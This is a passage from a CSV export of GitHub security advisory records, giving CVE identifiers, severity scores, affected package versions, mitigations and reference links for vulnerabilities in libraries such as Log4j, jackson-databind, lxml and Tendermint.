'https://github.com/lxml/lxml/commit/12fa9669007180a7bb87d990c375cf91ca5b664a'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/commit/a3eacbc0dcf1de1c822ec29fb7d090a4b1712a9c#diff-59130575b4fb2932c957db2922977d7d89afb0b2085357db1a14615a2fcad776'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/commit/f2330237440df7e8f39c3ad1b1aa8852be3b27c0'}, {'type': 'PACKAGE', 'url': 'https://github.com/lxml/lxml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/12/msg00037.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TUIS2KE3HZ2AAQKXFLTJFZPP2IFHJTC7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V2XMOM5PFT6U5AAXY6EFNT5JZCKKHK2V/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGNET2A4WGLSUXLBFYKNC5PXHQMI3I7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQ4SPKJX3RRJK4UWA6FXCRHD2TVRQI44/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-06'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220107-0005/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5043'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-74', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-13T18:12:54Z', 'nvd_published_at': '2021-12-13T18:15:00Z'}" +1.4.0,GHSA-r695-7vr9-jgc2,2022-02-08T21:37:40Z,2021-12-09T19:16:51Z,,['CVE-2020-36187'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36187'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2997'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:23:27Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-j85f-xw9x-ffwp,2022-01-04T18:52:13Z,2021-12-17T20:00:12Z,,['CVE-2021-4121'],yetiforcecrm is vulnerable to Cross-site Scripting,yetiforcecrm is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yetiforce/yetiforce-crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4121'}, {'type': 'WEB', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm/commit/6b5967198e43b6fbb3b2715b49c6cd5b12ce08c3'}, {'type': 'PACKAGE', 'url': 'https://github.com/yetiforcecompany/yetiforcecrm'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6da878de-acdb-4b97-b9ff-9674c3f0881d'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:31:47Z', 'nvd_published_at': '2021-12-16T08:15:00Z'}" +1.4.0,GHSA-rpg7-q4cv-p466,2022-01-04T18:52:37Z,2021-12-17T20:00:16Z,,['CVE-2021-4123'],livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF),livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'remdex/livehelperchat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.90'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4123'}, {'type': 'WEB', 'url': 'https://github.com/livehelperchat/livehelperchat/commit/2a98c69cf8899afb9a76d737527abb1dd96fa106'}, {'type': 'PACKAGE', 'url': 'https://github.com/livehelperchat/livehelperchat'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/52182545-fdd6-4d4f-9fba-25010f7f8cba'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:29:07Z', 'nvd_published_at': '2021-12-16T10:15:00Z'}" +1.4.0,GHSA-94g7-hpv8-h9qm,2021-12-14T20:00:34Z,2021-12-14T21:46:35Z,,[],Remote code injection in Log4j,"### Impact +Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. + +More Details: +https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + +### Patches +Version 1.11.1 of the Splunk Logging for Java library. + +There is also a backport to version 1.6.2 released as a patch: 1.6.2-0-0. + +### Workarounds +If upgrading is not possible, then ensure the -Dlog4j2.formatMsgNoLookups=true system property is set on both client- and server-side components. + +### References +https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/splunk/splunk-library-javalogging/issues +* Email us at [devinfo@splunk.com](mailto:devinfo@splunk.com) +",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.splunk.logging:splunk-library-javalogging'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/splunk/splunk-library-javalogging/security/advisories/GHSA-94g7-hpv8-h9qm'}, {'type': 'PACKAGE', 'url': 'https://github.com/splunk/splunk-library-javalogging'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T20:00:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-j28q-p8ww-cp87,2021-12-15T15:23:03Z,2021-12-16T14:33:09Z,,['CVE-2021-23700'],Prototype Pollution in merge-deep2.,All versions of package merge-deep2 are vulnerable to Prototype Pollution via the mergeDeep() function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'merge-deep2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23700'}, {'type': 'PACKAGE', 'url': 'https://github.com/luyuan/merge-deep'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MERGEDEEP2-1727593'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:33:34Z', 'nvd_published_at': '2021-12-10T20:15:00Z'}" +1.4.0,GHSA-7rg2-qxmf-hhx9,2021-12-15T15:28:49Z,2021-12-09T19:08:58Z,,['CVE-2021-41246'],Session fixation in express-openid-connect,"### Overview + +Versions `2.3.0` up to and including `2.5.1` do not regenerate the session id and session cookie when user logs in. This behavior opens up the application to various session fixation vulnerabilities. + +### Am I affected? +You are affected by this vulnerability if you are using `express-openid-connect` version `2.3.0` up to and including `2.5.1` and use a custom session store. + + +### How to fix that? +Upgrade to version `>= 2.5.2`. + +### Will this update impact my users? +The fix provided in patch will not affect your users.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'express-openid-connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/express-openid-connect/security/advisories/GHSA-7rg2-qxmf-hhx9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41246'}, {'type': 'WEB', 'url': 'https://github.com/auth0/express-openid-connect/commit/5ab67ff2bd84f76674066b5e129b43ab5f2f430f'}, {'type': 'PACKAGE', 'url': 'https://github.com/auth0/express-openid-connect'}, {'type': 'WEB', 'url': 'https://github.com/auth0/express-openid-connect/releases/tag/v2.5.2'}]","{'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-09T18:09:56Z', 'nvd_published_at': '2021-12-09T16:15:00Z'}" +1.4.0,GHSA-2wr2-8qjq-gh55,2021-12-06T21:35:33Z,2021-12-16T15:27:35Z,,['CVE-2021-23264'],Exposure of Resource to Wrong Sphere in org.craftercms:crafter-search,"Installations, where crafter-search is not protected, allow unauthenticated remote attackers to create, view, and delete search indexes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.craftercms:crafter-search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23264'}, {'type': 'WEB', 'url': 'https://github.com/craftercms/craftercms/commit/0e256ef0372c7be9d6e2fefc4652dd4fd94770a1'}, {'type': 'WEB', 'url': 'https://docs.craftercms.org/en/3.1/security/advisory.html#cv-2021120107'}]","{'cwe_ids': ['CWE-402', 'CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T21:35:33Z', 'nvd_published_at': '2021-12-02T16:15:00Z'}" +1.4.0,GHSA-p33m-7w7f-gmj8,2021-07-29T16:41:29Z,2021-12-10T20:05:07Z,,['CVE-2020-7644'],Uncontrolled Resource Consumption in fun-map,fun-map through 3.3.1 is vulnerable to Prototype Pollution. The function assocInM could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fun-map'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7644'}, {'type': 'WEB', 'url': 'https://github.com/nathan7/fun-map/blob/master/index.js#L137,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FUNMAP-564436'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:37:47Z', 'nvd_published_at': '2020-04-28T19:15:00Z'}" +1.4.0,GHSA-6jqj-f58p-mrw3,2022-10-06T21:46:48Z,2021-12-20T18:17:33Z,,['CVE-2020-15091'],Denial of Service in TenderMint,"### Description + +**Denial of Service** + +Tendermint 0.33.0 and above allow block proposers to include signatures for the wrong block. This may happen naturally if you start a network, have it run for some time and restart it without changing the chainID. (It is a [misconfiguration](https://docs.tendermint.com/master/tendermint-core/using-tendermint.html) to reuse chainIDs.) Correct block proposers will accidentally include signatures for the wrong block if they see these signatures, and then commits won't validate, making all proposed blocks invalid. A malicious validator (even with a minimal amount of stake) can use this vulnerability to completely halt the network. + +Tendermint 0.33.6 checks all the signatures are for the block with +2/3 majority before creating a commit. + +**False Witness** + +Tendermint 0.33.1 and above are no longer fully verifying commit signatures during block execution - they stop after +2/3. This means proposers can propose blocks that contain valid +2/3 signatures and then the rest of the signatures can be whatever they want. They can claim that all the other validators signed just by including a CommitSig with arbitrary signature data. While this doesn't seem to impact safety of Tendermint per se, it means that Commits may contain a lot of invalid data **. + +_** This was already true of blocks, since they could include invalid txs filled with garbage, but in that case the application knew that they are invalid and could punish the proposer. But since applications didn't--and don't-- verify commit signatures directly (they trust Tendermint to do that), they won't be able to detect it._ + +This can impact incentivization logic in the application that depends on the LastCommitInfo sent in BeginBlock, which includes which validators signed. For instance, Gaia incentivizes proposers with a bonus for including more than +2/3 of the signatures. But a proposer can now claim that bonus just by including arbitrary data for the final -1/3 of validators without actually waiting for their signatures. There may be other tricks that can be played because of this. + +Tendermint 0.33.6 verifies all the signatures during block execution ***. + +_*** Please note that the light client does not check nil votes and exits as soon as 2/3+ of the signatures are checked._ + +### Impact + +- All nodes +- The network stops due to having a commit with a wrong signature. + +### Patches + +- v0.33.6 + +### Workarounds + +No workarounds. + +### References + +- https://github.com/tendermint/tendermint/issues/4926 + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [tendermint/tendermint](https://github.com/tendermint/tendermint) +* Email us at [security@tendermint.com](mailto:security@tendermint.com) + +More information can be found [here](https://tendermint.com/security/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tendermint/tendermint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.33.0'}, {'fixed': '0.33.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/security/advisories/GHSA-6jqj-f58p-mrw3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15091'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/issues/4926'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/pull/5426'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/commit/480b995a31727593f58b361af979054d17d84340'}, {'type': 'PACKAGE', 'url': 'https://github.com/tendermint/tendermint'}, {'type': 'WEB', 'url': 'https://github.com/tendermint/tendermint/blob/master/CHANGELOG.md#v0336'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0090'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T20:49:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-v525-c3g5-cg9p,2021-03-15T23:45:19Z,2021-12-10T17:15:49Z,,['CVE-2020-36282'],Unsafe Deserialization that can Result in Code Execution,JMS Client for RabbitMQ 1.x before 1.15.2 and 2.x before 2.2.0 is vulnerable to unsafe deserialization that can result in code execution via crafted StreamMessage data.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.rabbitmq.jms:rabbitmq-jms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0'}, {'fixed': '2.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.rabbitmq.jms:rabbitmq-jms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.15.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36282'}, {'type': 'WEB', 'url': 'https://github.com/rabbitmq/rabbitmq-jms-client/issues/135'}, {'type': 'WEB', 'url': 'https://github.com/rabbitmq/rabbitmq-jms-client/pull/136/commits/f647e5dbfe055a2ca8cbb16dd70f9d50d888b638'}, {'type': 'WEB', 'url': 'https://github.com/rabbitmq/rabbitmq-jms-client/releases/tag/v1.15.2'}, {'type': 'WEB', 'url': 'https://github.com/rabbitmq/rabbitmq-jms-client/releases/tag/v2.2.0'}, {'type': 'WEB', 'url': 'https://medium.com/@ramon93i7/a99645d0448b'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T23:45:19Z', 'nvd_published_at': '2021-03-12T01:15:00Z'}" +1.4.0,GHSA-jm34-xm8m-w958,2021-05-19T22:31:56Z,2021-12-20T18:04:40Z,,['CVE-2017-1000070'],Open Redirect in oauth2_proxy,The Bitly oauth2_proxy in version 2.1 and earlier was affected by an open redirect vulnerability during the start and termination of the 2-legged OAuth flow. This issue was caused by improper input validation and a violation of RFC-6819,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/bitly/oauth2_proxy'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000070'}, {'type': 'WEB', 'url': 'https://github.com/bitly/oauth2_proxy/issues/228'}, {'type': 'WEB', 'url': 'https://github.com/bitly/oauth2_proxy/pull/359'}, {'type': 'WEB', 'url': 'https://github.com/bitly/oauth2_proxy/commit/289a6ccf463a425c7606178c510fc5eeb9c8b050'}, {'type': 'WEB', 'url': 'https://tools.ietf.org/html/rfc6819#section-5.2.3.5'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000070'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T22:31:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-vfqx-33qm-g869,2023-09-14T16:04:17Z,2021-12-09T19:16:59Z,,['CVE-2020-36189'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 an 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36189'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2996'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:14:22Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}" +1.4.0,GHSA-4m6q-rxhm-675w,2021-07-28T23:08:13Z,2021-12-09T19:54:29Z,,['CVE-2020-7636'], OS Command Injection in adb-driver,adb-driver through 0.1.8 is vulnerable to Command Injection.It allows execution of arbitrary commands via the command function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'adb-driver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7636'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ADBDRIVER-564430'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/adb-driver'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:33:09Z', 'nvd_published_at': '2020-04-06T13:15:00Z'}" +1.4.0,GHSA-7rjr-3q55-vv33,2022-02-24T18:12:21Z,2021-12-14T18:01:28Z,,['CVE-2021-45046'],Incomplete fix for Apache Log4j vulnerability,"# Impact + +The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack. + +## Affected packages +Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use. + +# Mitigation + +Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). + +Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.13.0'}, {'fixed': '2.16.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.12.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-45046'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jfh8-c2jp-5v3q'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/'}, {'type': 'WEB', 'url': 'https://logging.apache.org/log4j/2.x/security.html'}, {'type': 'WEB', 'url': 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032'}, {'type': 'WEB', 'url': 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd'}, {'type': 'WEB', 'url': 'https://www.cve.org/CVERecord?id=CVE-2021-44228'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5022'}, {'type': 'WEB', 'url': 'https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html'}, {'type': 'WEB', 'url': 'https://www.kb.cert.org/vuls/id/930724'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2021/12/14/4'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/alert-cve-2021-44228.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/14/4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/15/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/18/1'}]","{'cwe_ids': ['CWE-502', 'CWE-917'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T17:55:00Z', 'nvd_published_at': '2021-12-14T19:15:00Z'}" +1.4.0,GHSA-gfhx-jjwq-63gv,2021-12-08T20:20:15Z,2021-12-10T20:24:11Z,,['CVE-2021-42567'],Cross-site Scripting in Apereo CAS,Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-core-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42567'}, {'type': 'WEB', 'url': 'https://github.com/apereo/cas/commit/376bf087d6d4267f61fc9f8028aa0d1ef407c3f0'}, {'type': 'WEB', 'url': 'https://apereo.github.io/2021/10/18/restvuln/'}, {'type': 'PACKAGE', 'url': 'https://github.com/apereo/cas'}, {'type': 'WEB', 'url': 'https://github.com/apereo/cas/releases'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T20:20:15Z', 'nvd_published_at': '2021-12-07T22:15:00Z'}" +1.4.0,GHSA-hx6g-q9v2-xh7v,2021-12-06T22:01:08Z,2021-12-16T15:30:48Z,,['CVE-2021-3980'],Information exposure in elgg,elgg is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor. Forms in the view namespace 'forms/admin' were not protected by an AdminGatekeeper in case of AJAX requests to 'ajax/form/admin/'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'elgg/elgg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'elgg/elgg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3980'}, {'type': 